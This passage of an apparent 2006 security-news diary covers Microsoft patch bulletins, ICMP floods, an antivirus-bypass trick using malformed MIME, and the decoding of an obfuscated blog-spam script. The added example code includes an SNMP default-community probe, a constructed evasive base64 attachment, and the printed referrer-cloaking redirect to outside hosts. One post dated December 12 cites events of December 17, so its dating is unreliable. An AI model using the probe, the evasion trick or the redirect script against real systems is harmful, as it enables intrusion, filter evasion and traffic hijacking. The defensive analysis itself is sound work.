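    """BER length: short form below 128, otherwise 0x80|count followed by the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body


def _ber_int(value: int) -> bytes:
    # minimal two's-complement encoding; the extra byte keeps the sign bit clear
    return _tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))


def _ber_oid(oid: str) -> bytes:
    """Encode a dotted OID: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_get_request(community: str, oid: str, request_id: int) -> bytes:
    """SNMPv1 GetRequest for one OID, as a complete UDP payload."""
    varbind = _tlv(0x30, _ber_oid(oid) + _tlv(0x05, b""))              # OID, NULL value
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0)   # error-status, error-index
               + _tlv(0x30, varbind))
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)  # version 0 = v1


def _read_tlv(buf: bytes, pos: int):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_message(datagram: bytes) -> dict:
    """Pull version, community and PDU type out of a v1/v2c datagram (e.g. one
    sniffed on 161/udp) and flag a default community string."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE, so not an SNMP message")
    vtag, vbody, pos = _read_tlv(msg, 0)
    ctag, cbody, pos = _read_tlv(msg, pos)
    ptag, pbody, _ = _read_tlv(msg, pos)
    if vtag != 0x02 or ctag != 0x04:
        raise ValueError("unexpected header layout (SNMPv3 puts a SEQUENCE where the community goes)")
    _, rid, _ = _read_tlv(pbody, 0)
    community = cbody.decode("latin-1")
    return {
        "version": {0: "v1", 1: "v2c"}.get(int.from_bytes(vbody, "big", signed=True), "unknown"),
        "community": community,
        "pdu_type": PDU_NAMES.get(ptag, f"0x{ptag:02x}"),
        "request_id": int.from_bytes(rid, "big", signed=True),
        "weak_community": community.lower() in WEAK_COMMUNITIES,
    }


def probe(host: str, community: str = "public", timeout: float = 2.0):
    """Ask for sysDescr.0; a reply means a listener is up and accepts that community.
    Returns the parsed reply or None on timeout. Needs the network, so the
    self-test does not exercise it."""
    pkt = build_get_request(community, "1.3.6.1.2.1.1.1.0", 0x5EED)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(pkt, (host, 161))
        try:
            reply, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_message(reply)


if __name__ == "__main__":
    pkt = build_get_request("public", "1.3.6.1.2.1.1.1.0", 1234)
    print(pkt.hex())
    print(parse_message(pkt))
```

Point parse_message at the payloads of a capture filtered on udp port 161 and any datagram that comes back with "weak_community": True is a device still answering to "public"; point probe at your own hosts after the patch to confirm the listener really is gone where you thought it was disabled.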


Published: 2006-12-12

MS06-077: Remote Installation Service (RIS) remote exploit

This vulnerability only affects Windows 2000 Server SP4 with RIS installed and configured to allow anonymous access to the system that serves the installation files. With anonymous access, a remote user could view, change or delete data or create accounts, including having malware installed on systems built by RIS. It is possible to exploit this vulnerability over the Internet if permissions were set so poorly as to allow anonymous access to everyone; a simple firewall blocks this vector. The patch removes the vulnerability by no longer giving anonymous TFTP users write access to the file structure.

This vulnerability has not been disclosed publicly and Microsoft reports no indication of active exploitation.

Microsoft rates this update as important; however, the very specific OS version needed and other mitigating technologies make this an unimportant patch for all but a few users.

Bulletin: MS06-077

John Bambenek
bambenek /at/ gmail /dot/ com


Published: 2006-12-12

MS06-073: WMI Object Broker Vulnerability (CVE-2006-4704)

This one is "highly critical". A working exploit is already available for Metasploit.

The WMI Object Broker is an ActiveX control used by Visual Studio 2005. An attacker would use a malicious web page to exploit it. You have to have Visual Studio 2005 installed in order to be vulnerable. The vulnerable file is WmiScriptUtils.dll.

As with other ActiveX features, Internet Explorer 7 mitigates this somewhat, as you have to "opt in" to individual ActiveX controls in order to use them. The Enhanced Security Configuration on Windows 2003 turns off ActiveX as well, limiting exposure.

What you should do:
- On a client with Visual Studio 2005 installed: patch now.
- On a client without Visual Studio 2005: you should not have this control.
- On a server: check that you are using the "Enhanced Security Configuration" for MSIE. The patch is unlikely to apply.

I do recommend upgrading to Internet Explorer 7 if you are regularly using Internet Explorer.

eEye Advisory


Published: 2006-12-12

Microsoft Black Tuesday - December 2006 overview

Overview of the December 2006 Microsoft patches and their status.

Columns: Bulletin | Affected | Contra indications (KB) | Known exploits | Microsoft rating | ISC rating(*) (clients / servers)

MS06-072  Internet Explorer - remote code execution
  Contra indications: no known problems (KB 925454)
  Known exploits: no known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

MS06-073  Visual Studio 2005 - remote code execution
  Contra indications: no known problems (KB 925674)
  Known exploits: exploit publicly available
  Microsoft rating: Critical
  ISC rating: clients PATCH NOW / servers Important

MS06-074  SNMP - remote code execution - buffer overflow
  Contra indications: no known problems (KB 926247)
  Known exploits: exploit available in a for-pay program
  Microsoft rating: Important
  ISC rating: clients Critical / servers Critical

MS06-075  csrss - privilege escalation
  Contra indications: no known problems (KB 926255)
  Known exploits: no known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS06-076  Outlook Express - remote code execution
  Contra indications: no known problems (KB 923694)
  Known exploits: no known exploits
  Microsoft rating: Important
  ISC rating: Less Urgent

MS06-077  RIS - remote code execution
  Contra indications: no known problems (KB 926121)
  Known exploits: no known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS06-078  Windows Media Player - remote code execution
  Contra indications: no known problems (KB 923689, KB 925398)
  Known exploits: exploits available for the .asx vulnerability
  Microsoft rating: Critical
  ISC rating: clients PATCH NOW / servers Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Section 66


Published: 2006-12-12

ICMP - call for packets ?

One of our readers is reporting a fairly recent increase in ICMP packets hitting his firewall. If you're seeing the same we'd like some data:

  • on the importance and timeframe of the increase;
  • the type of ICMP packets you're receiving;
  • some idea of how it correlates (sweeping your address range, just hitting one IP, coming from all over, coming from specific hosts, ...);
  • if possible a small sample of some out of the ordinary packet captures.
As always you can upload your results through our contact form.
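For this call for packets and for the ping floods reported on December 17 the questions are the same: how much ICMP per minute, of which types, from how many sources, and against one address or a sweep of the range. Below is an added example, not ISC tooling, that answers them from tcpdump -nn text output (IPv4 only). The sample lines are constructed, not a real capture, with the flood scaled down from the reported tens of thousands per minute and a stray TCP line included to show that the parser ignores what it is not asked about.

```python
import re
from collections import Counter, defaultdict

# tcpdump -nn line, IPv4 only ("IP6 ... ICMP6, ..." lines are skipped)
LINE_RE = re.compile(
    r"^(?P<hh>\d\d):(?P<mm>\d\d):\d\d(?:\.\d+)?\s+IP\s+"
    r"(?P<src>\d+(?:\.\d+){3})\s+>\s+(?P<dst>\d+(?:\.\d+){3}):\s+ICMP\s+(?P<rest>.*)$"
)


def build_sample_lines():
    """Constructed sample, not a real capture: 30 sources flood one host with
    echo requests for two minutes (1200/minute), plus a little normal ICMP
    and one TCP line that the parser must ignore."""
    lines = []
    for i in range(2400):
        sec = i // 20                       # 20 requests per second for 120 seconds
        src = f"203.0.113.{i % 30 + 1}"
        lines.append(f"12:{sec // 60:02d}:{sec % 60:02d}.{(i * 1111) % 1000000:06d} "
                     f"IP {src} > 198.51.100.7: ICMP echo request, id 1, seq {i}, length 40")
    for i in range(10):
        lines.append(f"12:00:{i:02d}.500000 IP 198.51.100.7 > 192.0.2.1: ICMP echo reply, id 7, seq {i}, length 40")
    for i in range(3):
        lines.append(f"12:01:{i:02d}.250000 IP 192.0.2.53 > 198.51.100.7: ICMP 192.0.2.53 udp port 53 unreachable, length 36")
    lines.append("12:00:09.000000 IP 192.0.2.8.51515 > 198.51.100.7.80: Flags [S], seq 1, win 65535, length 0")
    return lines


def icmp_kind(rest: str) -> str:
    """Collapse tcpdump's ICMP description into a coarse type name."""
    r = rest.lower()
    for key in ("echo request", "echo reply", "unreachable", "time exceeded", "redirect", "timestamp"):
        if key in r:
            return key
    return "other"


def summarize(lines, flood_threshold=1000, sweep_targets=50):
    """Answer the handler's questions about an ICMP surge: how much, which
    types, how many sources, one target or a sweep."""
    kinds, per_minute, per_source = Counter(), Counter(), Counter()
    sources, targets = defaultdict(set), defaultdict(set)
    parsed = 0
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        parsed += 1
        kind = icmp_kind(m["rest"])
        kinds[kind] += 1
        sources[kind].add(m["src"])
        targets[kind].add(m["dst"])
        if kind == "echo request":
            per_minute[f"{m['hh']}:{m['mm']}"] += 1
            per_source[m["src"]] += 1
    peak = max(per_minute.values(), default=0)
    n_src, n_dst = len(sources["echo request"]), len(targets["echo request"])
    if peak >= flood_threshold:
        shape = "distributed" if n_src > 10 else "few-source"
        target = "single target" if n_dst == 1 else f"{n_dst} targets"
        verdict = f"echo-request flood, {shape}, {target}"
    elif n_dst >= sweep_targets and n_src <= 5:
        verdict = "address sweep from few sources (reconnaissance)"
    else:
        verdict = "background"
    return {
        "parsed": parsed,
        "by_kind": dict(kinds),
        "echo_req_per_minute": dict(per_minute),
        "peak_per_minute": peak,
        "echo_req_sources": n_src,
        "echo_req_targets": n_dst,
        "top_sources": per_source.most_common(5),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in summarize(build_sample_lines()).items():
        print(f"{key}: {value}")
```

Feed it `tcpdump -nn -tt icmp` output piped through `cut` for the time field, or simply the raw lines as above; the per-minute table and the source/target counts are exactly what a submission to the contact form should contain, and the verdict line is what separates "someone is aiming at us" from "the Internet is noisier this week".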

Swa Frantzen -- Section 66


Published: 2006-12-12

PHP security: the scene might change

Will drew our attention to an interesting read in Stefan Esser's blog. It's about his resignation from the PHP Security Response Team. It's interesting to note that he has both discovered and reported PHP vulnerabilities in the past.

It seems the bottom line will be that we can expect some changes in how vulnerabilities in PHP are going to be handled in the future. It might include advisories about vulnerabilities without there being patches available. It might also mean an increase in the number of reported vulnerabilities.

Anyway it'll be worth it to add his PHP security blog to your routine if you need to know about PHP vulnerabilities.

Announcements about security vulnerabilities in widely deployed open source software without a matching patch are a very dangerous situation, so we hope this doesn't escalate too far.

Swa Frantzen -- Section 66

Published: 2006-12-10

Another new Word 0-day, information & dat released by McAfee

We received notification from an ISC participant that McAfee has released a dat today for protection against a buffer overflow attack in MS Word. The announcement says "Note: This vulnerability was first found through one of the samples that McAfee analyzed, and this vulnerability differs from the "Microsoft Word 0-Day Vulnerability I" that was published on December 5, 2006.".

Other vendors are expected to follow suit.

McAfee "Microsoft Word 0-Day Vulnerability II "

"Vendor Status - Unacknowledged
Vulnerable systems - Windows XP  SP0 - SP2, Windows 2003  SP0 - SP1, Microsoft Word  XP, Microsoft Word  2003"

McAfee has identified PWS-Agent.g as "a password stealing trojan that was most recently installed by Exploit MSWord.b via a 0-day Microsoft Word vulnerability.".

Thanks for the heads up!

eEye Research has a site that's quite useful for tracking 0-days, Zero-Day Tracker

There's a report over at the Microsoft Security Response Center Blog!, see the New Report of A Word Zero Day.
According to the post, "the vulnerability is being exploited on a very, very limited and targeted basis". That is a description that adds further granularity to MS's explanation of "What “very limited, targeted attacks” Means". And as long as there's no patch forthcoming for this vuln (or the December 5th one), it's starting to sound like using the exploit is going to be "Rewarding, very, very, very rewarding" (see the Citi commercials/video).


Published: 2006-12-08

What will the big security stories of 2007 be?

For the last couple of years, we've asked you what you think will be the big security trends/stories in the coming year.  Well, 2006 is rapidly coming to a close, so I figured we might as well solicit some of those opinions again.  Deb Hale, in her story earlier this week, took a quick look at how you did with your predictions last year and it looks like you did pretty well.  So, what will it be in 2007?  Post your thoughts through our contact page, we'll summarize around the first of the year.


Published: 2006-12-08

nmap-4.20 released

Nmap-4.20 has been released, though the main page at insecure.org still lists 4.11 as the current version.



Published: 2006-12-08

Microsoft December advance patch notification

Microsoft is informing us that there will be 6 patches released on Tuesday.  Five for Windows (with a max severity of critical) and one critical patch for Visual Studio.  Note that there are no patches for Office, so the 2 new Word vulnerabilities reported earlier this week will remain unpatched.

See the MSRC blog entry here.


Published: 2006-12-07

Windows Media Player - ASX Playlist Buffer Overflow

ISS has published an advisory on a buffer overflow found in Windows Media Player 9 and 10 related to handling .ASX playlist files.  This follows a similar advisory by FrSIRT.  It appears that these advisories are coming in response to indications that there are in-the-wild exploits of the vulnerability.  The issue has been public since back on November 22nd.

Read the ISS Advisory, the FrSIRT Advisory, and the original Bugtraq posting.

(Thanks to everyone who sent this in...)


Published: 2006-12-07

Intel LAN Driver Buffer Overflow Local Privilege Escalation

According to Intel, there is a buffer overflow in the drivers for one of their most popular NICs that can be used to escalate privilege locally.  The flaw affects drivers for Intel PRO 10/100 adapters on Windows (>=Win2K), Linux, and UnixWare platforms.  A complete listing of affected driver versions can be found here.

(Note: Thanks to everyone who pointed out that we needed to add an equals sign to the Windows description.)


Published: 2006-12-07

Follow the Bouncing EMule

Robert Danford, one of the other ISC Handlers, happened to mention in the Sooper Secret ISC Handler Chat Room that a co-worker was investigating a local spike in traffic to port 1755 TCP.  In looking at the DShield data, we're seeing levels jumping all over the place.  By capturing packets, Robert's co-worker, Dan Frasnelli, was able to pin down what was flying by: eMule traffic.  Doing a little searching (Google is your friend), we found that the kidz (in response to Eeeeevil ISPs throttling P2P traffic) have decided to use 1755 TCP.  Why?  Well, because Windows Media Server lives on that port, and they believe that they'll stand less chance of getting throttled.  We've seen them move ports before: from 4662 -> 6662.

You know... if some of the people putting all of the thought and energy into obfuscating JavaScript, writing malware, getting P2P around ISPs, etc... want to stop by my house, I've got a "honey-do" list about 10 pages long that they could work on.


Published: 2006-12-07

Malformed MIMEs can bypass AV

Over on Quantenblog, they're reporting that malformed MIME attachments can, in some cases, be used to bypass email AV filtering.  It works like this:  because email standards were written back in the day when messages were only text (as God intended), they only guaranteed that 7 of the 8 bits in a byte would make it through.  Now that emails contain everything from spreadsheets and executables to pretty-formatted dancing gerbils, we need a way to send the full 8 bits, while still meeting the original standards.  To do this, we need a means of encoding 8 bit content into 7 bit email messages.  One encoding scheme uses an "alphabet" containing 64 characters, and essentially takes 3 bytes of data and turns them into 4 bytes of encoded information.  This is what Multipurpose Internet Mail Extensions (MIME) and specifically its base64 encoding (what the Quantenblog post calls MIME64) is all about.  The MIME standard (RFC 2045) says that when you're decoding, if you come across a character that isn't part of your "alphabet," you're supposed to ignore it and move on.  The problem arises when an AV engine doesn't follow this standard, and an email program does.  The AV engine doesn't scan the attachment properly, but the email program presents the fully decoded attachment for the end-user's clicking pleasure.

More info: http://www.quantenblog.net/security/virus-scanner-bypass

Update: Hendrick over at Quantenblog asked us to clarify the info on this a bit... In most cases, altering the MIME64 encoded content isn't sufficient to bypass AV.  Additional layers of "multipart/mixed" nestings are required (and in some cases, extreme nesting depths themselves can cause resource exhaustion in AV products).

(Thanks Robert!)
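To make the gap concrete, here is an added example (not the diary's or Quantenblog's code) that decodes a base64 part two ways, strictly and the RFC 2045 way, and flags the part when the two disagree, which is exactly the mismatch between a non-conforming scanner and the mail client. It also walks nested multipart/mixed boundaries and reports the nesting depth, for the second trick the update mentions. It runs under node with nothing but the standard library; the message it inspects is constructed, not a real capture.

```javascript
'use strict';
// Added example, not the diary's or Quantenblog's code. Runs under node.
// The message below is constructed: a base64 attachment with '#' sprinkled
// through the encoded text, wrapped in two levels of multipart/mixed.

// --- the two decoders whose disagreement is the bypass ---------------------

const B64_FOREIGN = /[^A-Za-z0-9+\/=]/g;           // anything outside the alphabet
const B64_VALID = /^[A-Za-z0-9+\/]*={0,2}$/;

// "Strict" decoder: tolerates whitespace (line wrapping is normal) but gives up
// on any other foreign character. This models a scanner that does not follow
// RFC 2045 and therefore never sees the real attachment bytes.
function decodeStrict(body) {
  const compact = body.replace(/\s+/g, '');
  if (!B64_VALID.test(compact)) return null;
  return Buffer.from(compact, 'base64');
}

// RFC 2045 section 6.8 decoder: characters outside the alphabet are ignored.
// This is what the mail client does, so this is what the user gets to click.
function decodeLenient(body) {
  return Buffer.from(body.replace(B64_FOREIGN, ''), 'base64');
}

// --- a minimal MIME walker, enough to follow nested multipart boundaries ----

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Splits one entity into a lower-cased header map and its raw body text.
function splitHeaders(raw) {
  const idx = raw.search(/\r?\n\r?\n/);
  const headText = idx === -1 ? raw : raw.slice(0, idx);
  const body = idx === -1 ? '' : raw.slice(idx).replace(/^\r?\n\r?\n/, '');
  const headers = {};
  for (const line of headText.split(/\r?\n/)) {
    const m = /^([\w-]+):\s*(.*)$/.exec(line);
    if (m) headers[m[1].toLowerCase()] = m[2];
  }
  return { headers, body };
}

// Collects leaf parts; depth = number of multipart containers above the part.
function walkParts(raw, depth, out) {
  const { headers, body } = splitHeaders(raw);
  const ct = headers['content-type'] || '';
  const bm = /boundary="?([^";]+)"?/i.exec(ct);
  if (/^multipart\//i.test(ct) && bm) {
    const delim = new RegExp('\\r?\\n?--' + escapeRegExp(bm[1]) + '(?:--)?[ \\t]*(?:\\r?\\n|$)');
    const chunks = body.split(delim);          // [preamble, part, part, ..., epilogue]
    for (const chunk of chunks.slice(1, -1)) walkParts(chunk, depth + 1, out);
  } else {
    out.push({ headers, body, depth });
  }
  return out;
}

// --- the check a filter should run ------------------------------------------

function auditMessage(raw, maxDepth = 5) {
  const parts = walkParts(raw, 0, []);
  const depth = Math.max(0, ...parts.map(p => p.depth));
  const findings = [];
  if (depth > maxDepth) findings.push(`multipart nesting depth ${depth} exceeds ${maxDepth}`);
  for (const p of parts) {
    if ((p.headers['content-transfer-encoding'] || '').toLowerCase() !== 'base64') continue;
    const strict = decodeStrict(p.body);
    const lenient = decodeLenient(p.body);
    if (strict === null || !strict.equals(lenient)) {
      const n = (p.body.match(/[^A-Za-z0-9+\/=\s]/g) || []).length;
      findings.push(`base64 part "${p.headers['content-type']}" carries ${n} non-alphabet character(s); a strict decoder and an RFC 2045 decoder disagree`);
    }
  }
  return { depth, findings, parts };
}

// --- constructed sample -----------------------------------------------------

const ATTACHMENT_TEXT = 'MZ this stands in for an executable attachment';
const CLEAN_B64 = Buffer.from(ATTACHMENT_TEXT).toString('base64');
const DIRTY_B64 = CLEAN_B64.match(/.{1,4}/g).join('#');   // '#' between every 4 chars

const RAW_MESSAGE = [
  'From: sender@example.test',
  'To: victim@example.test',
  'Subject: constructed sample',
  'MIME-Version: 1.0',
  'Content-Type: multipart/mixed; boundary="outer"',
  '',
  '--outer',
  'Content-Type: multipart/mixed; boundary="inner"',
  '',
  '--inner',
  'Content-Type: text/plain',
  '',
  'Please see attached.',
  '--inner',
  'Content-Type: application/octet-stream; name="invoice.exe"',
  'Content-Transfer-Encoding: base64',
  '',
  DIRTY_B64,
  '--inner--',
  '--outer--',
  '',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  const { depth, findings } = auditMessage(RAW_MESSAGE);
  console.log(`nesting depth ${depth}`);
  for (const f of findings) console.log('FLAG: ' + f);
}
```

The useful signal is not "junk in the base64" by itself but the disagreement: if your gateway's own decode of a part differs from the RFC 2045 decode, the user is about to open something the scanner never looked at, and the part should be quarantined rather than passed.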


Published: 2006-12-07

Climb a small mountain...

I really love malware authors who write their stuff in JavaScript.  They try so hard to be like real programmers... and they're just so gosh-darned cute.

They're at their especially "I-want-to-be-a-big-boy-programmer" best when they jump through all sorts of hoops to obfuscate their handiwork.  It's almost as if they don't realize that they're programming in a toy language that's INTERPRETED...

So yesterday, I'm sitting in an airport waiting standby on a flight to get me home in time to see my daughter's choir concert, and my cell phone rings.  According to Caller ID, it's Ed Skoudis - friend, fellow Intelguardian, fellow ISC Handler, and all-around infosec stud.  I answer it anyway.

"Hey buddy!  How's it going?" I hear Ed's all-too-chipper voice through the phone.  

"Hmmm...," I think, "feigned pleasantry coupled with a fraternal 'buddy' reference.  Ed wants something."

"Hey... I have a favor to ask you..."

And so Ed, who was ISC Handler-on-duty, went on to explain that he'd received an email from a reader who had come across what appeared to be some sort of encoded JavaScript.  According to the reader, the script was found on a webpage that had been spammed to several blogs, and he was concerned that there might be something evil going on.

"Generally if you're on the up-and-up, you don't feel the need to obfuscate what you're doing," was Ed's conclusion.

Can't argue with that.

"So, what do you need me for?" I asked.

"Well... I'm really kind of swamped, both with HOD stuff and real work stuff, and I know how much you like this kind of thing..."


"Ok... send it to me."

After shooting the breeze with Ed for a few more minutes, I hang up and flip open my laptop, planning to hop onto the local public WiFi and ssh my way into the mailserver… only to find that there IS no public WiFi available.

Sigh... #2

"Ok," I decide, adopting my best those-grapes-are-probably-sour-anyway attitude, "my laptop is too dang big to use on a plane comfortably anyway.  I'll just work on it tonight when I get home."  But as the minutes to my flight tick away, I find myself looking at my shiny new "Windows Mobile" cell phone, and an evil plan begins to take shape.

"Nah...," I think, "it would never work... but it would sure be cool to try..."

So, as the clerks begin calling different groups for boarding, I furiously kick off the mail client on my phone, grab Ed's message from the server and save it as a text file.

A few minutes later, I'm seated on the plane, looking at the text of the email message in Pocket Word.  I work down through the message, deleting everything but the actual text of the script:

var arr =

 ... many, MANY rows of numbers deleted ...


var table = new Array();
table['0'] = 0;table['1'] = 1;
table['2'] = 2;table['3'] = 3;
table['4'] = 4;table['5'] = 5;
table['6'] = 6;table['7'] = 7;
table['8'] = 8;table['9'] = 9;
table['a'] = 10;table['b'] = 11;
table['c'] = 12;table['d'] = 13;
table['e'] = 14;table['f'] = 15;
function markCounter(a) {
  var txt = ""; var c = 0;
  while (c < a.length) {
    txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]);
    c += 2;
  }
}
demo = ""+false;details = "false";
if (demo == details) {

I slap an <html><head></head><body>...</body></html> framework around the script, and I'm ready to delve into the code itself.

The first thing that strikes me is the "eval(txt)" call.  That's where the actual rubber meets the road in this script.  I'll need to take care of that.

I replace "eval(txt)" with the following:

document.write("<textarea rows=50 cols=50>");

I also get rid of all the "demo" crud at the bottom, replacing it with a simple call:


Having done that, I change the name of the file from "edsmail.txt" to "edsmail.htm," and fire it off in Pocket IE.

It displays my TEXTAREA, but... well... nothing else.  Perhaps I'm not as clever as I think I am.


Turns out, it was the JavaScript jockey who wasn't so clever.  Dude... if you're out there and reading this, take some notes, ok? You can't access a string using array notation: "a[c]" doesn't work.  Here's how you fix it:  you need to replace "a[c]" with "a.substr(c, 1)"

I correct Mr. LeetHaxor's code, and it promptly dumps the following into my TEXTAREA:

var ref = document.referrer;
var loc = document.location.href;
if (ref.indexOf("google") == -1 && ref.indexOf("yahoo") == -1 &&
ref.indexOf("msn") == -1) {
document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
} else {
if (ref.indexOf("site:") >= 0 || ref.indexOf("site%3A") >= 0) {
 document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
} else {
 var re = new RegExp("http:\/\/([a-z0-9\-A-Z\.]*)\/");
 var domain = re.exec(loc);
 if (domain == null) {
  document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
 } else {
  re = new RegExp("\\.([a-z0-9\-A-Z\.]*)");
  topdomain = re.exec(domain[1]);
  if (ref.indexOf(domain[1]) != -1 || ref.indexOf(topdomain[1]) != -1) {
   document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
  } else {
   re = new RegExp("q=[^&]*");
   var m = re.exec(ref);
   if (m == null) {
    re = new RegExp("p=[^&]*");
    m = re.exec(ref);
    if (m == null) {
     document.location.href =
"http://activefreehost.com/removed.php?url=" + loc;
    } else {
     var q = m[0].substring(2);
     q = q.replace(/\+/, "_");
     q = q.replace(/\s/, "_");
     document.location.href = "http://stuphome.com/p/" + q + ".html";
     }
    } else {
     var q = m[0].substring(2);
     q = q.replace(/\+/, "_");
     q = q.replace(/\s/, "_");
     document.location.href = "http://stuphome.com/p/" + q + ".html";
    }
   }
  }
 }
}

Looks like someone is VERY interested in referrer info, but doesn't want anyone to know it.

So... all of you JavaScript geniuses out there, please take note:  I "cracked" this obfuscation while munching on in-flight pretzels and working ON MY CELLPHONE.  If you seriously don't want someone to know what you're up to, then I think your encoding techniques should require cracking on something that doesn't ring...

Tom Liston - Senior Security Consultant - Intelguardians
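As an added example (not Tom Liston's code and not the script from the page), here are the two pieces of the story re-created so they can be run under node without a browser: the hex-pair decoder the obfuscated script fed to eval(), with eval() swapped for a capture function (the same move as replacing eval(txt) with a document.write() of a textarea), and the referrer-cloaking decision the decoded script makes, as a pure function you can feed referrers to. SAMPLE_PAYLOAD is a constructed stand-in for the real "arr" data, which the diary does not reproduce; the activefreehost.com and stuphome.com URLs are the ones in the decoded script. Note that current engines accept a[c] on strings, so the script's original bug only bites on old engines such as Pocket IE; a.substr(c, 1) works on both.

```javascript
'use strict';
// Added example, not Tom Liston's code and not the script from the page.
// SAMPLE_PAYLOAD is constructed; the two URLs are from the decoded script.

// ---- stage 1: decode, but do not run --------------------------------------

// Equivalent of the script's table[] and markCounter(): two hex digits per
// character. Uses a.substr(c, 1), the fix the diary applied, which also works
// in old engines (Pocket IE) that lack string indexing with a[c].
function hexDecode(a) {
  const table = {};
  const digits = '0123456789abcdef';
  for (let i = 0; i < digits.length; i++) table[digits.charAt(i)] = i;
  let txt = '';
  for (let c = 0; c + 1 < a.length; c += 2) {
    txt += String.fromCharCode(table[a.substr(c, 1)] * 16 + table[a.substr(c + 1, 1)]);
  }
  return txt;
}

// Encoder, used only to build the constructed sample.
function hexEncode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const h = s.charCodeAt(i).toString(16);
    out += (h.length < 2 ? '0' : '') + h;
  }
  return out;
}

// Harness: where the script calls eval(txt), hand txt to a sink instead.
function deobfuscate(encoded, sink) {
  const decoded = hexDecode(encoded);
  sink(decoded);
  return decoded;
}

const SAMPLE_PAYLOAD = 'var ref = document.referrer; if (ref.indexOf("google") == -1) { document.location.href = "http://example.invalid/bounce"; }';
const SAMPLE_ENCODED = hexEncode(SAMPLE_PAYLOAD);

// ---- stage 2: what the decoded script decides -----------------------------

const BOUNCE = 'http://activefreehost.com/removed.php?url=';
const LANDING = 'http://stuphome.com/p/';

// Same decision tree as the decoded script. Visitors who did not arrive from
// a Google/Yahoo/MSN search, used a site: query, or came from the page's own
// domain are bounced; a real search arrival is sent to a page named after the
// query (q= for Google/MSN, p= for Yahoo). The character class below is the
// script's [a-z0-9\-A-Z\.] in the usual order; the topdomain null guard is
// added so a dotless host does not throw.
function chooseDestination(ref, loc) {
  if (ref.indexOf('google') == -1 && ref.indexOf('yahoo') == -1 && ref.indexOf('msn') == -1) return BOUNCE + loc;
  if (ref.indexOf('site:') >= 0 || ref.indexOf('site%3A') >= 0) return BOUNCE + loc;
  const domain = new RegExp('http://([a-zA-Z0-9.-]*)/').exec(loc);
  if (domain == null) return BOUNCE + loc;
  const topdomain = new RegExp('\\.([a-zA-Z0-9.-]*)').exec(domain[1]);
  if (ref.indexOf(domain[1]) != -1 || (topdomain != null && ref.indexOf(topdomain[1]) != -1)) return BOUNCE + loc;
  let m = new RegExp('q=[^&]*').exec(ref);
  if (m == null) m = new RegExp('p=[^&]*').exec(ref);
  if (m == null) return BOUNCE + loc;
  let q = m[0].substring(2);
  q = q.replace(/\+/, '_');   // first occurrence only, as in the original
  q = q.replace(/\s/, '_');
  return LANDING + q + '.html';
}

if (typeof require !== 'undefined' && require.main === module) {
  deobfuscate(SAMPLE_ENCODED, txt => console.log('decoded payload:\n' + txt));
  console.log(chooseDestination('http://www.google.com/search?q=cheap+pills&hl=en', 'http://victim.example/page.html'));
  console.log(chooseDestination('', 'http://victim.example/page.html'));
}
```

Running chooseDestination() with a few referrers shows why the analyst, the blog owner and anyone typing the URL directly all get bounced while a search-engine visitor lands on a page named after their own query: the cloaking is aimed at exactly the people who would investigate.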


Published: 2006-12-06

Adobe Acrobat Update

Adobe has classified the recent vulnerability as a critical issue and recommends that Acrobat Reader be upgraded to version 8 or, as a minimum, that the affected DLL be replaced.

To quote them directly they are saying "Adobe categorizes this as a critical issue and recommends affected users uninstall any affected software."

Their advisory can be found here

You may need to take steps to test and patch/upgrade your end user systems.

Thanks Matt for the pointer.

